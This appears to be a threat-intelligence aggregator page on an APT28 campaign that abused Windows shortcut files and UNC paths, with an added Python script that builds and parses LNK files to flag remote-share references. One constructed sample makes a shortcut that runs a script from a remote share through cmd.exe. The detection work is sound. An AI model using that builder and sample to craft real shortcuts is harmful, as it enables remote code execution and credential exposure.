
APT28 Windows Shell LNK campaign targeting Ukraine and E.U. nations

Type: Campaign · Happening score: 53 · Sources: 1 unique source, 1 article

Summary

A December 2025 APT28 campaign targeted Ukraine and E.U. nations with a malicious Windows Shortcut (LNK) chain that bypassed Microsoft Defender SmartScreen and gave the attacker code execution on the victim host. The chain abused Windows Shell parsing of the shortcut and a UNC path to pull remote payloads, so that simply opening a file became a quiet delivery path. Because a UNC path is resolved over SMB, the same chain also triggered SMB authentication to the attacker's server and could expose the victim's Net-NTLMv2 response (which can be cracked offline or relayed), increasing the risk of follow-on access abuse.
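To make the UNC-path point in the summary concrete, the following Python script is an added example for this page, not code from the reporting or from any APT28 sample. It builds a minimal Shell Link file from constructed fields (the host name files.example.net and the file names are made up), then parses the header, the optional LinkInfo block and the StringData fields as laid out in MS-SHLLINK and lists every field that references a \\host\share path. Each such reference makes the victim host open an SMB connection and authenticate when the shortcut is displayed or launched, which is the exposure described above.

```python
import re
import struct

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData fields appear in this fixed order, each present only when its flag is set
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")  # \\host\share\...


def build_lnk(name=None, relative_path=None, working_dir=None, arguments=None, icon_location=None):
    """Build a minimal Unicode Shell Link: header, StringData, TerminalBlock.
    Constructed for this example; real samples usually also carry an IDList and LinkInfo."""
    values = {"name": name, "relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments, "icon_location": icon_location}
    flags = IS_UNICODE
    string_data = b""
    for bit, key in STRING_FIELDS:
        if values[key] is not None:
            flags |= bit
            # CountCharacters (uint16) followed by that many UTF-16LE code units
            string_data += struct.pack("<H", len(values[key])) + values[key].encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID
    header += struct.pack("<II", flags, 0x20)                  # LinkFlags, FileAttributes (ARCHIVE)
    header += b"\x00" * 24                                     # Creation/Access/Write FILETIMEs
    header += struct.pack("<IiIHHII", 0, 0, 1, 0, 0, 0, 0)     # FileSize, IconIndex, ShowCommand, HotKey, Reserved1-3
    assert len(header) == HEADER_SIZE
    return header + string_data + b"\x00\x00\x00\x00"          # TerminalBlock closes ExtraData


def parse_lnk(data):
    """Return the StringData fields and, if LinkInfo carries one, the network share name."""
    if len(data) < HEADER_SIZE or data[4:20] != LNK_CLSID or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    out = {}
    if flags & HAS_LINK_TARGET_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]      # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        info_size, _, info_flags, _, _, cnrl_off = struct.unpack_from("<6I", data, pos)
        if info_flags & 0x2:                                   # CommonNetworkRelativeLinkAndPathSuffix
            cnrl = pos + cnrl_off
            net_name_off = struct.unpack_from("<I", data, cnrl + 8)[0]
            start = cnrl + net_name_off
            out["link_info_net_name"] = data[start:data.index(b"\x00", start)].decode("ascii", "replace")
        pos += info_size
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                out[key] = data[pos:pos + count].decode("latin-1")  # system code page in reality
                pos += count
    return out


def unc_references(data):
    """List (field, UNC path) pairs; each one makes the host talk SMB to a remote server."""
    hits = []
    for field, value in parse_lnk(data).items():
        if field == "link_info_net_name":
            if value.startswith("\\\\"):
                hits.append((field, value))
            continue
        hits.extend((field, m.group(0)) for m in UNC_RE.finditer(value))
    return hits


# Constructed samples: a shortcut that launches cmd.exe with a script on a remote share and an icon on the
# same share (host name is made up for this example), and a benign shortcut to a local document.
SUSPICIOUS_LNK = build_lnk(
    relative_path="..\\..\\Windows\\System32\\cmd.exe",
    working_dir="C:\\Users\\Public",
    arguments="/c \\\\files.example.net\\pub\\update.cmd",
    icon_location="\\\\files.example.net\\pub\\doc.ico",
)
BENIGN_LNK = build_lnk(relative_path="..\\Documents\\report.docx", working_dir="C:\\Users\\Public")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, unc_references(blob))
```

Run over a quarantined .lnk (`unc_references(open(path, "rb").read())`), any hit is worth a look: even a UNC path that appears only in the icon location causes an outbound SMB authentication without the user launching anything, so a hunting rule should not limit itself to the command-line arguments.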

Related Happenings

Windows 11 BitLocker bypass YellowKey security flaw

Vulnerability
First: 14.05.2026 10:27 Last: 14.05.2026 10:27 Sources 1

About this happening: **YellowKey** is a **Windows BitLocker security feature bypass** tracked as **CVE-2026-45585** that can expose **BitLocker-protected drives** through the **Windows Recovery Enviro...

Latest development: 20.05.2026 10:31

Microsoft assigned CVE-2026-45585 to YellowKey, a Windows BitLocker security feature bypass, and recommended removing autofstx.exe from the Session Manager BootExecute REG_MULTI_SZ value, reestablishing BitLocker trust for WinRE, and moving already encrypted devices from TPM-only to TPM+PIN to require a pre-boot PIN.

FamousSparrow Azerbaijani oil-and-gas targeting campaign

Campaign
First: 13.05.2026 16:00 Last: 13.05.2026 16:00 Sources 1

About this happening: The **China-linked FamousSparrow group** ran a **targeted cyberespionage campaign** against an **Azerbaijani oil-and-gas company** in the **South Caucasus**, highlighting a new...

FamousSparrow multi-wave intrusion campaign against Azerbaijani oil and gas company

Campaign
First: 13.05.2026 16:00 Last: 13.05.2026 16:00 Sources 1

About this happening: A **China-affiliated** actor tracked as **FamousSparrow (UAT-9244)** ran a **multi-wave intrusion** against an **unnamed Azerbaijani oil and gas company** from **late December 202...

CISA adds ScreenConnect and Windows flaws to KEV

Public Sector Action
First: 29.04.2026 11:46 Last: 29.04.2026 11:46 Sources 1

About this happening: CISA added **CVE-2024-1708** and **CVE-2026-32202** to the **KEV catalog**, elevating the flaws to a **federal remediation priority** because they are being **actively exploited**...

Windows Shell spoofing flaw actively exploited (CVE-2026-32202)

Vulnerability
First: 28.04.2026 08:50 Last: 28.04.2026 08:50 Sources 1

How related: Microsoft on Monday revised its advisory for a now-patched, high-severity security flaw impacting Windows Shell to acknowledge that it has been actively exploited in the wild.

About this happening: **Microsoft** updated **Windows Shell** advisory guidance to confirm **CVE-2026-32202** was **actively exploited in the wild**, raising the risk of sensitive-information disclosur...

Timeline

  1. 28.04.2026 08:50 · 2 articles

    Initial report: APT28 Windows Shell LNK campaign targeting Ukraine and E.U. nations

    Initial Disclosure

    In **December 2025**, **APT28** began sending a **malicious LNK file** to targets in **Ukraine** and **E.U. nations** to trigger a Windows Shell exploit chain. The initial delivery was designed to bypass **Microsoft Defender SmartScreen** and to obtain code execution with a remotely fetched payload by abusing how the shell parses the shortcut.
